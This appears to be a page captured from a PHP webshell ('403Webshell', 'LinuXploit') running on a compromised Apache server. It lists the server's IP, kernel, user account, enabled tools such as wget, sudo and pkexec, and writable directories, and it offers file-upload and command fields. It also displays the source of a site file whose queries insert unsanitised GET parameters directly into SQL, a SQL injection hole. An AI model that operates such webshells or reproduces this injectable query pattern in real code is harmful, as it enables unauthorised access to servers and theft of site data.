403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/playwithfaye.com/public_html/free2/tour/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/playwithfaye.com/public_html/free2/tour/single_tour_code.php
<?php 

$asset_id = $_GET["asset_id"];

$show_message = 'y'; 

$show_featured = 'n';



	$query = "SELECT m.name, a.title, a.user_def_id, m.description, t2m.model_id, t2m.asset_id, UNIX_TIMESTAMP(a.p_date) as f_date   ";

	$query .= "FROM mod2vid t2m, models m, assets a ";

	$query .= "where t2m.model_id = m.model_id and t2m.asset_id = a.asset_id and a.asset_id = '".$asset_id."' ";

	$result = mysql_query($query) or die('Query failed: ' . mysql_error());

	$row_model = mysql_fetch_assoc($result);

	$name = $row_model["name"];

	$f_date = $row_model["f_date"];



	$description = $row_model["description"];

	$user_def_id = $row_model["user_def_id"];

	

	$starring_string = tour_models_starring($asset_id, $nats);

	$nolink_starring_string = nolink_models_starring($asset_id, $nats);

	

	$needles = array(" ", "&", ",");

	$name_nospace = str_replace($needles, '', $nolink_starring_string);

	$put_dir = TOUR_ROOT."/feed/$asset_id/$name_nospace"."_"."$user_def_id/";

	$filename = $put_dir."".$name_nospace.".php";

	$static_page = TOUR_URL."/feed/$asset_id/$name_nospace"."_"."$user_def_id/$name_nospace.php";



	// ==========================================================================================================	

	$page_name="../tour.php";

if(!isset($_GET["start"])) {                         // This variable is set to zero for the first page

$start = '0';

}else {$start = $_GET["start"];}



$eu = ($start); 

$limit = 1;                                 		// No of records to be shown per page.

$this1 = $eu + $limit; 

$back = $eu - $limit; 

$next = $eu + $limit; 







$query = " SELECT distinct(a.asset_id),  a.media, a.user_def_id, t2m.model_id, DATE_FORMAT(a.p_date, '%m.%d.%Y') as show_date,   a.description, UNIX_TIMESTAMP(a.p_date) as f_date, a.photos_count, t.free_link, t.tour_description, t.tour_title 

FROM mod2vid t2m, assets a, tour t 

WHERE ((t2m.asset_id = a.asset_id) and t.asset_id = a.asset_id) and a.asset_id = '".$asset_id."'   group by a.asset_id   order by a.p_date desc";



$result2 = mysql_query($query);

	$row2 = mysql_fetch_assoc($result2)or die('The corn is so hot there it is creating an error: ' . mysql_error());

	$nume = mysql_num_rows($result2);
	$f_date = $row2["f_date"];
	$media = $row2["media"];

	$free_link = $row2["free_link"];

	$title_add = $row_model["name"] ." - ". $row2["tour_title"]  ;
	$query .= " limit $eu, $limit";

	

	$result_main = mysql_query($query)or die('The sporn is so hot there it is creating an error: ' . mysql_error());

		$num_result_main = mysql_num_rows($result_main);

	$top_img_dir = "../tour/images/assets/".wordwrap($asset_id, 1, "/",1)."/".$asset_id;

	

	$url_dir = TOUR_URL."/images/".$asset_id."/topgraphic.jpg";

	

	$i='1';

?>

Youez - 2016 - github.com/yon3zu
LinuXploit